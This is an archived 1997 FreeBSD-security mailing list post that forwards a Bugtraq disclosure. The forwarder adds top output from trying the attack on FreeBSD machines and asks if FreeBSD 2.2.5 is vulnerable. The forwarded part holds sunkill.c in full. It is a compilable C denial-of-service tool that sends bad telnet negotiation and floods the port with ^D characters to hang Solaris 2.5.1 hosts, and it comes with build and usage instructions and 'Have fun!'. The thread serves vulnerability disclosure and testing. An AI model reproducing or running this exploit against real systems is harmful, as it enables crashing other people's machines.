Date: Sun, 14 Dec 1997 22:52:52 -0800 (PST) From: Jan Koum <jkb@best.com> To: freebsd-security@freebsd.org Subject: To kill a sun: (fwd) Message-ID: <Pine.BSF.3.96.971214223836.1241A-100000@shell6.ba.best.com>
next in thread | raw e-mail | index | archive | help
Hi all, I tried this against my 2.2.5-RELEASE machine which is on the ethernet with another FreeBSD (3.0-CURRENT) machine. The 2.2.5 one usually doing nothing but running an rc5-64 client (Go team FreeBSD Japan!). Here is what top showed: last pid: 20938; load averages: 2.04, 1.65, 1.30 22:42:21 16 processes: 3 running, 13 sleeping CPU states: 81.5% user, 0.0% nice, 5.0% system, 13.5% interrupt, 0.0% idle Mem: 13M Active, 1152K Inact, 7564K Wired, 7624K Cache, 3606K Buf, 1896K Free Swap: 128M Total, 96K Used, 128M Free PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND 3616 jkb 53 -20 824K 316K RUN 222.7H 68.89% 68.89% rc564 20923 root 63 0 192K 616K RUN 1:21 27.35% 27.35% telnetd ^^^^^^^^^^^^^ 16129 root 2 0 492K 720K select 15:33 1.45% 1.45% ppp 20932 jkb 29 0 600K 796K RUN 0:01 0.04% 0.04% top 134 root 18 0 332K 416K pause 0:46 0.00% 0.00% cron 171 jkb 18 4 452K 284K pause 0:00 0.00% 0.00% csh Usually the load is at 1.00 since I have rc564 running with priority of -20. But this time it was 2.xx -- I guess telnetd doubled it this time. Running this against 3.0-CURRENT (from a week ago or so) wasn't as horrible and showed this: last pid: 4861; load averages: 0.18, 0.65, 0.48 22:45:12 39 processes: 2 running, 37 sleeping CPU states: 23.3% user, 0.0% nice, 3.9% system, 1.6% interrupt, 71.2% idle Mem: 19M Active, 21M Inact, 11M Wired, 9384K Cache, 4942K Buf, 828K Free Swap: 256M Total, 84M Used, 172M Free, 33% Inuse PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND 2894 jkb 2 0 40228K 14716K RUN 121:26 7.21% 7.21% netscape 2867 jkb 2 0 19156K 15788K select 37:14 4.46% 4.46% Xaccel 4855 root 2 0 204K 432K sbwait 0:00 2.22% 1.83% telnetd ^^^^^^^^^^^^ 4858 jkb 28 0 820K 636K RUN 0:00 0.82% 0.61% top 2868 jkb 2 0 436K 456K select 0:23 0.15% 0.15% afterstep 3165 jkb 2 0 708K 344K select 0:01 0.08% 0.08% ssh Does that mean that 2.2.5 is vulnerable to a little DoS? I am comparing it to 3.0 which handles it with a lot of grace. -- Yan ---------- Forwarded message ---------- Date: Sat, 13 Dec 1997 15:48:51 -0500 From: Jason Zapman II <zapman@CC.GATECH.EDU> To: BUGTRAQ@NETSPACE.ORG Subject: To kill a sun: This is sunkill.c It Affects at least solaris 2.5.1 machines, both sun4c and sun4m achitecutures. I imagine it affects all solaris 2.5.1 machines, both sparc and x86, but im not sure. It basically works by opening a telnet connection on the victim machine and sends a few bad telnet negotiation options, then flooods the port with lots of ^D characters. This uses all the streams memory (i think) on the victims machine and causes the kernel to get very angry. The machien crawls to a halt, the cursor in X stops moving, the machine is unresponsive to the network. Its a bad situation all around. /* ** To make, if your system is BSD'ish: gcc <thisfile> ** ...if your system is SysV'ish: gcc -lnsl -lsocket <thisfile> ** ** Usage: a.out <victim's hostname> ** ** Have fun! */ #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/telnet.h> #include <string.h> #include <unistd.h> #define BUFSIZE 100 #define DOTS void catchit(void) { printf("\nCaught SIGPIPE -- your link may be too slow.\n"); exit(1); } int main(int argc, char *argv[]) { unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO, \ TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \ TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO}; unsigned char nastybuf[BUFSIZE]; struct sockaddr_in sin; struct servent *sp; struct hostent *hp; int s; typedef void (*sig_t) (int); signal(SIGPIPE,(sig_t)catchit); memset(nastybuf,4,BUFSIZE); /* ascii 4 = ^D */ if (!(s = socket(AF_INET, SOCK_STREAM, 0))) { printf("no socket\n"); exit(1); } if (!(hp = gethostbyname(argv[1]))) { printf("unknown host\n"); exit(1); } bzero(&sin,sizeof(sin)); bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length); sin.sin_family = AF_INET; sp = getservbyname("telnet","tcp"); sin.sin_port = sp->s_port; if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) { printf("can't connect to host\n"); exit(1); } printf("connected to %s\n",argv[1]); write(s,kludge_telopt,21); /* kludge some telnet negotiation */ /* "Let them eat ^Ds..." */ while (write(s,nastybuf,BUFSIZE) != -1) { #ifdef DOTS write(STDOUT_FILENO,".",1); #endif } } Jason -- Jason Price | If you want to build a ship, don't drum up people Theta Xi, | together to collect wood and don't assign them tasks Beta, Alpha 449 | and work, but rather teach them to long for the endless jprice@poboxes.com | immensity of the sea. -- Antoine de Saint Exupery
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.971214223836.1241A-100000>